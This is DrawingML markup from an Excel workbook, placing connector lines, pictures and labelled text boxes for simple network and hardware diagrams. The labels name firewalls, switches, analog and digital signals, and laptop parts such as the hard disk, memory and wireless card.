      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>449580</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>99060</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="61" name="直接连接符 60"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="10800000" flipV="1">
          <a:off x="6553200" y="2468880"/>
          <a:ext cx="2545080" cy="22860"/>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3185160</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5730240</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>91440</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="62" name="直接连接符 61"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="10800000" flipV="1">
          <a:off x="3474720" y="2461260"/>
          <a:ext cx="2545080" cy="22860"/>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693420</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>1394460</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>205740</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="63" name="TextBox 62"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="982980" y="2377440"/>
          <a:ext cx="7010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r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>Digital</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>信号</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7292340</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8008620</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>190500</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="64" name="TextBox 63"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7581900" y="2362200"/>
          <a:ext cx="7162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r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>digital</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>信号</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4335780</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5074920</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>205740</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="65" name="TextBox 64"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4625340" y="2377440"/>
          <a:ext cx="7391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r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>Analog</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>信号</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7018020</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7513320</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>167400</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="54" name="TextBox 53"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7307580" y="1249680"/>
          <a:ext cx="495300" cy="39600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pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>Fire</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>wall</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7665720</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8267700</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="60" name="TextBox 59"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7955280" y="1280160"/>
          <a:ext cx="601980" cy="304800"/>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1100"/>
            <a:t>switch</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>99060</xdr:colOff>
      <xdr:row>18</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4671060</xdr:colOff>
      <xdr:row>32</xdr:row>
      <xdr:rowOff>144780</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="1025" name="Picture 1" descr="http://hiphotos.baidu.com/xiaomeng10000/pic/item/495e47311534a5845edf0e99.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="388620" y="3848100"/>
          <a:ext cx="4572000" cy="2705100"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7620</xdr:colOff>
      <xdr:row>33</xdr:row>
      <xdr:rowOff>144780</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3827549</xdr:colOff>
      <xdr:row>49</xdr:row>
      <xdr:rowOff>170700</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="67" name="Picture 2" descr="http://i.technet.microsoft.com/Cc700828.SGFG15604(zh-cn,TechNet.10).gif"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="297180" y="6736080"/>
          <a:ext cx="3819929" cy="2952000"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5722619</xdr:colOff>
      <xdr:row>20</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7505699</xdr:colOff>
      <xdr:row>30</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="68" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/7e7f790997823bfa3ac76351.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="6012179" y="8305800"/>
          <a:ext cx="1783080" cy="1897380"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4258525</xdr:colOff>
      <xdr:row>68</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="69" name="Picture 5" descr="http://pagesadmin.ednchina.com/images/article/ff56daf1-d4a4-4ddb-93f5-a9601cfbba11/2.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId4" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="289560" y="13792200"/>
          <a:ext cx="4258525" cy="3291840"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4404357</xdr:colOff>
      <xdr:row>33</xdr:row>
      <xdr:rowOff>144780</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7865895</xdr:colOff>
      <xdr:row>49</xdr:row>
      <xdr:rowOff>170700</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="70" name="Picture 3" descr="http://www.vlan9.com/ArtImage/20050822/7009_4.gif"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId5" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="4693917" y="6736080"/>
          <a:ext cx="3461538" cy="2952000"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4800600</xdr:colOff>
      <xdr:row>49</xdr:row>
      <xdr:rowOff>22860</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7886700</xdr:colOff>
      <xdr:row>69</xdr:row>
      <xdr:rowOff>2847</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="71" name="Picture 4" descr="http://www.pcdog.com/ArtImage/20071119/308928-4.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId6" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="5090160" y="13563600"/>
          <a:ext cx="3086100" cy="3637587"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>68579</xdr:colOff>
      <xdr:row>35</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>1021079</xdr:colOff>
      <xdr:row>38</xdr:row>
      <xdr:rowOff>15240</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="72" name="TextBox 71"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="358139" y="6995160"/>
          <a:ext cx="952500" cy="5257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zh-CN" altLang="en-US" sz="1100"/>
            <a:t>外界</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>防火墙设计</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4366258</xdr:colOff>
      <xdr:row>38</xdr:row>
      <xdr:rowOff>91440</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5318758</xdr:colOff>
      <xdr:row>41</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="73" name="TextBox 72"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4655818" y="7597140"/>
          <a:ext cx="952500" cy="5257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zh-CN" altLang="en-US" sz="1100"/>
            <a:t>虚拟防火墙设计</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8260080</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>44940</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="74" name="直接连接符 73"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="8549640" y="1424940"/>
          <a:ext cx="144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7490460</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7670460</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="75" name="直接连接符 74"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7780020" y="1424940"/>
          <a:ext cx="180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1836420</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>2088420</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="76" name="直接连接符 75"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="2125980" y="1424940"/>
          <a:ext cx="252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1356360</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>1851660</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>167400</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="77" name="TextBox 76"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1645920" y="1249680"/>
          <a:ext cx="495300" cy="39600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pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>Fire</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>wall</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>541020</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>1143000</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="78" name="TextBox 77"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="830580" y="1280160"/>
          <a:ext cx="601980" cy="304800"/>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1100"/>
            <a:t>switch</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>1135380</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>1387380</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="79" name="直接连接符 78"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1424940" y="1424940"/>
          <a:ext cx="252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2.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>335280</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>556260</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>114300</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="2" name="矩形 1"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5494020" y="762000"/>
          <a:ext cx="3451860" cy="19126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2</xdr:col>
      <xdr:colOff>533400</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1661160</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>15240</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="3" name="矩形 2"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5692140" y="769620"/>
          <a:ext cx="1737360" cy="7086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3</xdr:col>
      <xdr:colOff>243840</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>83820</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>2537460</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>60960</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="4" name="矩形 3"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6012180" y="2095500"/>
          <a:ext cx="2293620" cy="5257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3</xdr:col>
      <xdr:colOff>426720</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1287780</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>22860</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="5" name="矩形 4"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6195060" y="1531620"/>
          <a:ext cx="861060" cy="5029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3</xdr:col>
      <xdr:colOff>1417320</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>2346960</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="6" name="矩形 5"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7185660" y="1714500"/>
          <a:ext cx="929640" cy="3276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4</xdr:col>
      <xdr:colOff>487680</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>83820</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>556260</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>45720</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="7" name="矩形 6"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="8877300" y="815340"/>
          <a:ext cx="68580" cy="6934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3</xdr:col>
      <xdr:colOff>457200</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>121920</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1173480</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="8" name="TextBox 7"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6225540" y="1036320"/>
          <a:ext cx="716280" cy="29718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zh-CN" altLang="en-US" sz="1100"/>
            <a:t>硬盘</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>510540</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1226820</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>114300</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="9" name="TextBox 8"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6278880" y="1645920"/>
          <a:ext cx="716280" cy="29718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zh-CN" altLang="en-US" sz="1100"/>
            <a:t>内存条</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>899160</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1615440</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="10" name="TextBox 9"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6667500" y="2247900"/>
          <a:ext cx="716280" cy="29718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zh-CN" altLang="en-US" sz="1100"/>
            <a:t>电池</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1493520</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>91440</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>2278380</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>22860</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="11" name="TextBox 10"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7261860" y="1737360"/>
          <a:ext cx="784860" cy="29718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zh-CN" altLang="en-US" sz="1100"/>
            <a:t>无线网卡</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>259080</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>99060</xdr:rowOff>
    </xdr:from>
    <xdr:to>
